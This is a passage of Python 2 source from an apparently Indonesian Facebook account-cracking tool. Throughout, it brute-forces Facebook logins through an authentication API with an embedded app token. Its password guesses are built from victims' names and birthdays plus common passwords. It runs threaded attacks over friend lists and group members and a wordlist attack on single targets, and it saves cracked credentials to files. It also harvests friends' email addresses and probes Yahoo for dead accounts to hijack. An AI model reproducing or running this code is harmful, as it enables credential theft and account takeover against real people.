print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahirs = a['birthday']
gaz = lahirs.replace('/', '')
pz5 = a['first_name']+gaz
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz7 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz7
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
print "\033[1;91m[!] Sorry, failed to open the target password :("
print "\033[1;91m[!] try it another way."
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
except KeyError:
print "\033[1;91m[!] Terget not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
##### Multi Brute Force #####
##### CRACK ####
def crack():
global idlist,passw,file
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
idlist = raw_input('\033[1;91m[+] \033[1;92mFile ID \033[1;91m: \033[1;97m')
passw = raw_input('\033[1;91m[+] \033[1;92mPassword \033[1;91m: \033[1;97m')
try:
file = open((idlist), "r")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
def scrak():
global berhasil,cekpoint,gagal,back,up
try:
os.mkdir('out')
except OSError:
pass
try:
buka = open(idlist, "r")
up = buka.read().split()
while file:
username = file.readline().strip()
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(passw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == (len(up)):
break
if 'access_token' in mpsh:
bisa = open("out/mbf_ok.txt", "w")
bisa.write(username+"|"+passw+"\n")
bisa.close()
x = requests.get("https://graph.facebook.com/"+username+"?access_token="+mpsh['access_token'])
z = json.loads(x.text)
berhasil.append("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+username+"|" +passw+" =>"+z['name'])
elif 'www.facebook.com' in mpsh["error_msg"]:
cek = open("out/mbf_cp.txt", "w")
cek.write(username+"|"+passw+"\n")
cek.close()
cekpoint.append("\033[1;97m[ \033[1;93mCP✚\033[1;97m ] "+username+"|" +passw)
else:
gagal.append(username)
back +=1
sys.stdout.write('\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m:\033[1;97m '+str(back)+' \033[1;96m>\033[1;97m '+str(len(up))+' =>\033[1;92mLive\033[1;91m:\033[1;96m'+str(len(berhasil))+' \033[1;97m=>\033[1;93mCheck\033[1;91m:\033[1;96m'+str(len(cekpoint)));sys.stdout.flush()
except IOError:
print"\n\033[1;91m[!] Sleep"
time.sleep(1)
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
def hasil():
print
print 42*"\033[1;97m═"
###Berhasil
for b in berhasil:
print(b)
###CEK
for c in cekpoint:
print(c)
###Gagal
print 42*"\033[1;97m═"
print ("\033[31m[x] Failed \033[1;97m--> " + str(len(gagal)))
keluar()
############### SUPER MBF ################
def super():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;95m║--\033[1;91m> \033[1;96m1.\033[1;93m Crack with list friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m2.\033[1;93m Crack from friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m3.\033[1;93m Crack from member group"
print "\033[1;95m║--\033[1;91m> \033[1;96m0.\033[1;93m Back"
print "║"
pilih_super()
def pilih_super():
peak = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if peak =="":
print "\033[1;91m[!] Wrong input"
pilih_super()
elif peak =="1":
os.system('reset')
print logo
jalan('\033[1;94m[✺] \033[1;96mGet all friend id \033[1;95m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet all id from friend \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('reset')
print logo
idg=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong input"
pilih_super()
print "\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print 42*"\033[1;97m═"
##### crack #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
#Pass1
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass1+" =>"+z['name'])
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
#Pass2
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass2+" =>"+z['name'])
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
#Pass3
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass3+" =>"+z['name'])
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
#Pass4
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass4+" =>"+z['name'])
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
#Pass5
pass5 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass5+" =>"+z['name'])
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
#Pass6
pass6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass6+" =>"+z['name'])
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
#Pass7
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name']+'doraemon321'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass7+" =>"+z['name'])
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal OK/CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;91m[+] \033[1;92mCP File saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
######################################################
##### BRUTE FORCE #####
def brute():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
try:
email = raw_input("\033[1;91m[+] \033[1;92mID\033[1;97m/\033[1;92mEmail\033[1;97m/\033[1;92mHp \033[1;97mTarget \033[1;91m:\033[1;97m ")
passw = raw_input("\033[1;91m[+] \033[1;92mWordlist \033[1;97mext(list.txt) \033[1;91m: \033[1;97m")
total = open(passw,"r")
total = total.readlines()
print 42*"\033[1;97m═"
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mTarget \033[1;91m:\033[1;97m "+email
print "\033[1;91m[+] \033[1;92mTotal\033[1;96m "+str(len(total))+" \033[1;92mPassword"
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m: \033[1;97m"+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("Brute.txt", "w")
dapat.write(email+" | "+pw+"\n")
dapat.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("Brutecekpoint.txt", "w")
ceks.write(email+" | "+pw+"\n")
ceks.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
time.sleep(1)
except IOError:
print ("\033[1;91m[!] File not found")
tanyaw()
def tanyaw():
why = raw_input("\033[1;91m[?] \033[1;92mCreate wordlist ? \033[1;92m[y/n]\033[1;91m:\033[1;97m ")
if why =="":
print "\033[1;91m[!] Wrong"
tanyaw()
elif why =="y":
wordlist()
elif why =="Y":
wordlist()
elif why =="n":
menu_hack()
elif why =="N":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
tanyaw()
##### YAHOO CHECKER #####
#---------------------------------------------------#
def menu_yahoo():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m With list friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Clone from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Clone from member group"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Using file"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
yahoo_pilih()
#----pilih
def yahoo_pilih():
go = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if go =="":
print "\033[1;91m[!] Wrong"
yahoo_pilih()
elif go =="1":
yahoofriends()
elif go =="2":
yahoofromfriends()
elif go =="3":
yahoomember()
elif go =="4":
yahoolist()
elif go =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mGetting email friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### CLONE FROM FRIEND #####
def yahoofromfriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/FriendMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FriendMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO MEMBER #####
def yahoomember():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from group \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO FILE #####
def yahoolist():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
files = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;91m[!] File not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
mpsh = []
jml = 0
